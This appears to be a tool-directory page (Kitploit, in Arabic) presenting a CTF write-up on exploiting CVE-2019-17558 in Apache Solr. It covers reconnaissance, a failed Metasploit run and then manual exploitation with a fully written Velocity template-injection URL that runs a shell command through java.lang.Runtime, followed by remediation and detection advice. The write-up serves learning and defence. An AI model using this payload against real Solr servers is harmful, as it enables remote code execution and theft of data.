Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-17558-apache-solr-rce — تقرير CTF يوثّق استغلال ثغرة CVE-2019-17558 في Apache Solr، ويغطي الاستطلاع، وقيود Metasploit، والحقن اليدوي لقالب Velocity، والتقاط العلم، والمعالجة. | Kitploit
أدوات/GitHubGitHub/rogerzeferino/cve-2019-17558-apache-solr-rce
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubrogerzeferino/cve-2019-17558-apache-solr-rce

cve-2019-17558-apache-solr-rce

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تقرير CTF يوثّق استغلال ثغرة CVE-2019-17558 في Apache Solr، ويغطي الاستطلاع، وقيود Metasploit، والحقن اليدوي لقالب Velocity، والتقاط العلم، والمعالجة.

عرض المستودع
13منذ شهر واحدلم تتم المراجعة بعد

Apache Solr RCE (CVE-2019-17558) - CTF Write-up

استغلال عملي لثغرة Velocity Template Injection في Apache Solr، والتطور من فشل في أداة آلية (Metasploit) إلى استغلال يدوي ناجح.

هذا التقرير يوثّق خط التفكير الكامل للتمرين، مع التركيز على تشخيص فشل الأداة والتحول إلى الاستغلال اليدوي.

السيناريو

العنصرالوصف
الهدفخادم Linux يشغّل Apache Solr على المنفذ 8983
الغرضقراءة محتوى ملف حساس (/home/favorite_book.txt)
الثغرةCVE-2019-17558 (RCE عبر Velocity Response Writer)

1. الاستطلاع

تألفت المرحلة الأولية من تحديد الخدمات النشطة على المضيف الهدف.

root@kitploit:~
nmap -sV -p- <TARGET_IP>

النتائج:

  • المنفذ 8983/tcp مفتوح.
  • الخدمة معرّفة على أنها Apache Solr.
  • تم تحديد Core عبر لوحة الويب، novacollection.

2. تحليل الثغرة

عند الوصول إلى لوحة الإدارة، تم التأكد من أن إصدار Solr كان عرضة لثغرة Velocity Template Injection.

تحدث الثغرة عندما يتمكن المهاجم من تغيير الإعداد params.resource.loader.enabled إلى true، مما يسمح باستخدام قوالب Velocity مخصصة، ومن ثم تنفيذ كود Java عشوائي على الخادم.

3. الاستغلال الآلي (Metasploit)

في البداية تم استخدام الوحدة exploit/multi/http/solr_velocity_rce.

تمكن الـ exploit من تغيير إعداد Solr بنجاح.

root@kitploit:~
[+] params.resource.loader.enabled is true for core 'novacollection'

ومع ذلك، فشلت المرحلة الأخيرة من حقن الـ payload بخطأ تنفيذ Ruby.

root@kitploit:~
NoMethodError: undefined method 'body' for nil:NilClass

يشير هذا إلى أنه على الرغم من أن البيئة كانت عرضة للخطر ومُجهزة مسبقًا، إلا أن الأداة لم تتمكن من معالجة استجابة الخادم لإنهاء الهجوم. لم يكن الهدف محصّنًا، بل كانت طريقة تسليم الوحدة هي التي تحتاج إلى تعديل.

4. الاستغلال اليدوي

مع تفعيل Velocity Writer مسبقًا بواسطة Metasploit، تم تنفيذ الحقن يدويًا عبر طلب HTTP GET، متجاوزًا خطأ السكربت. تم إنشاء قالب Velocity لاستدعاء java.lang.Runtime وتنفيذ أمر قراءة الملف المستهدف.

root@kitploit:~
http://<TARGET_IP>:8983/solr/novacollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat+/home/favorite_book.txt%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

الأمر الذي نُفذ فعليًا على الخادم:

root@kitploit:~
cat /home/favorite_book.txt

5. النتيجة

نجح الحقن وتم إرجاع محتوى الملف مباشرة في جسم استجابة HTTP، وعُرض في المتصفح، مما سمح بالتقاط الـ flag.

الدروس المستفادة

  • حدود الأدوات. يمكن أن تفشل الماسحات الضوئية و exploits الآلية بسبب خصوصيات البيئة أو أخطاء داخل الوحدة نفسها.
  • المعرفة الأساسية. فهم آلية عمل CVE-2019-17558 هو ما سمح بالتحول من فشل الأداة إلى هجوم يدوي ناجح.
  • المثابرة. لم يكن خطأ NoMethodError يعني أن الهدف آمن، بل فقط أن طريقة التسليم كانت تحتاج إلى تعديل.

المعالجة

  • تحديث Apache Solr إلى إصدار مصحح (8.4 أو أحدث).
  • ضمان بقاء params.resource.loader.enabled معطلاً.
  • تقييد الوصول إلى المنفذ 8983 على الشبكات الموثوقة فقط، وعدم كشف Solr مباشرة للإنترنت أبدًا.
  • مراقبة الطلبات الموجهة إلى الـ endpoint select باستخدام معاملات wt=velocity، وهي مفيدة كتوقيع كشف في SIEM.

المراجع

  • CVE-2019-17558 (NVD والوثائق الرسمية لـ Apache Solr).

إخلاء مسؤولية

أُنشئ هذا المستودع لأغراض تعليمية وتوثيق التعلم في بيئة خاضعة للتحكم (CTF). لا تستخدم هذه التقنيات ضد أنظمة دون إذن صريح.

تنزيل الأداة